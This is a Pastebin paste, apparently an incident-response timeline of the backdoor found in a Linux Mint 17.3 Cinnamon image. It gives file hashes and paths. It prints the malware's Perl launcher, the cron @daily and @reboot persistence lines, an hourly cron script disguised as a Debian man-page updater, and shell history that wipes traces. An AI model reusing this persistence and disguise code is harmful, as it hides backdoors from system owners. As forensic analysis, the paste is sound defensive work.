API tools faq
paste
Advertisement
eromang

Linux Mint 17.3 Cinnamon edition backdoor timeline

eromang
Feb 21st, 2016
3,338
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.35 KB | None | 0 0
raw download clone embed print report
  1. Linux Mint 17.3 Cinnamon edition backdoor timeline
  2.  
  3. * man.cy (9bc3f9009fcdad9a26c652eb8ef9a89f)
  4.  
  5. https://www.virustotal.com/en/file/b3b40059aa95d260b1c2df5a071cdc8b508c59ddcc75b88b11b94fb32dda35e0/analysis/
  6. File mentioned on The Linux Mint Blog http://blog.linuxmint.com/?p=2994 in /var/lib/
  7. -rw-r--r-- 1 root root 35365 Feb 19 14:27 man.cy
  8. https://gist.github.com/Oweoqi/31239851e5b84dbba894
  9.  
  10. * man (192ab4fb95b73dd3046362a36d6387e7)
  11.  
  12. https://www.virustotal.com/en/file/c29a12258d3383912fb9d2fc5d17651a2e606426dca729582ba8585a610bbb21/analysis/
  13. In /var/lib
  14. -rwxr-xr-x 1 root root 118 Feb 19 14:44 man
  15.  
  16. #!/usr/bin/perl
  17. $ps = `ps aux | grep apt-cache`;
  18. if(length($ps)>300) { die; } else {
  19. system("/var/lib/apt-cache");
  20. }
  21.  
  22. * apt-cache (d945f9b959f76afe24f3a804fe316806)
  23.  
  24. https://www.virustotal.com/en/file/b0134fe076b976d3fe1565385d15666bf3b68bd2a01718ef414dfa5c65365abb/analysis/
  25. In /var/lib/
  26. -rwxr-xr-x 1 root root 31816 Feb 19 14:42 apt-cache
  27.  
  28. * /root/.bash_history
  29.  
  30. -rw------- 1 root root 73 Feb 19 14:45 /root/.bash_history
  31.  
  32. ls
  33. rm -f man.c
  34. rm -f /root/.bash_history
  35. rm -f /root/.nano_history
  36. exit
  37.  
  38. * /var/log/apt/history.log
  39.  
  40. Start-Date: 2016-02-19 13:30:11
  41. Commandline: apt-get install build-essential
  42. Install: libstdc++-4.8-dev:amd64 (4.8.4-2ubuntu1~14.04.1, automatic), dpkg-dev:amd64 (1.17.5ubuntu5.5, automatic), libc-dev-bin:amd64 (2.19-0ubuntu6.7, automatic), g++:amd64 (4.8.2-1ubuntu6, automatic), g++-4.8:amd64 (4.8.4-2ubuntu1~14.04.1, automatic), build-essential:amd64 (11.6ubuntu6), libc6-dev:amd64 (2.19-0ubuntu6.7, automatic)
  43. Upgrade: libasan0:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libquadmath0:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), gcc-4.8-base:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), gcc-4.8-base:i386 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), cpp-4.8:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libgomp1:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libtsan0:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libc6:amd64 (2.19-0ubuntu6.6, 2.19-0ubuntu6.7), libc6:i386 (2.19-0ubuntu6.6, 2.19-0ubuntu6.7), libatomic1:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libgcc-4.8-dev:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libdpkg-perl:amd64 (1.17.5ubuntu5.4, 1.17.5ubuntu5.5), gcc-4.8:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libgfortran3:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libc6-dbg:amd64 (2.19-0ubuntu6.6, 2.19-0ubuntu6.7), libstdc++6:i386 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libstdc++6:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libitm1:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1)
  44. End-Date: 2016-02-19 13:31:45
  45.  
  46. * /var/spool/cron/crontabs/root
  47.  
  48. 156957 4 -rw------- 1 root crontab 1147 Feb 17 18:05 ./var/spool/cron/crontabs/root
  49.  
  50. Crontab modified to add /var/lib/man
  51.  
  52. # DO NOT EDIT THIS FILE - edit the master and reinstall.
  53. # (/tmp/crontab.VyGC8a/crontab installed on Wed Feb 17 17:05:35 2016)
  54. # (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
  55. # Edit this file to introduce tasks to be run by cron.
  56. #
  57. # Each task to run has to be defined through a single line
  58. # indicating with different fields when the task will be run
  59. # and what command to run for the task
  60. #
  61. # To define the time you can provide concrete values for
  62. # minute (m), hour (h), day of month (dom), month (mon),
  63. # and day of week (dow) or use '*' in these fields (for 'any').#
  64. # Notice that tasks will be started based on the cron's system
  65. # daemon's notion of time and timezones.
  66. #Common Examples:
  67. @daily /var/lib/man
  68. @reboot /var/lib/man
  69. # Output of the crontab jobs (including errors) is sent through
  70. # email to the user the crontab file belongs to (unless redirected).
  71. #
  72. # For example, you can run a backup of all your user accounts
  73. # at 5 a.m every week with:
  74. # 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
  75. #
  76. # For more information see the manual pages of crontab(5) and cron(8)
  77. #
  78. # m h dom mon dow command
  79.  
  80. * /etc/cron.hourly/man.sh
  81.  
  82. 263158 4 -rw-r--r-- 1 root root 172 Feb 17 18:03 ./etc/cron.hourly/man.sh
  83.  
  84. #!/bin/sh
  85. #
  86. # Script to update all the man pages
  87. #
  88. # Written by {full-name-debian-dev} <{email-debian-dev}> for the Debian project.
  89. #
  90. cd "/var/lib/"
  91. ./man > /dev/null 2>&1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!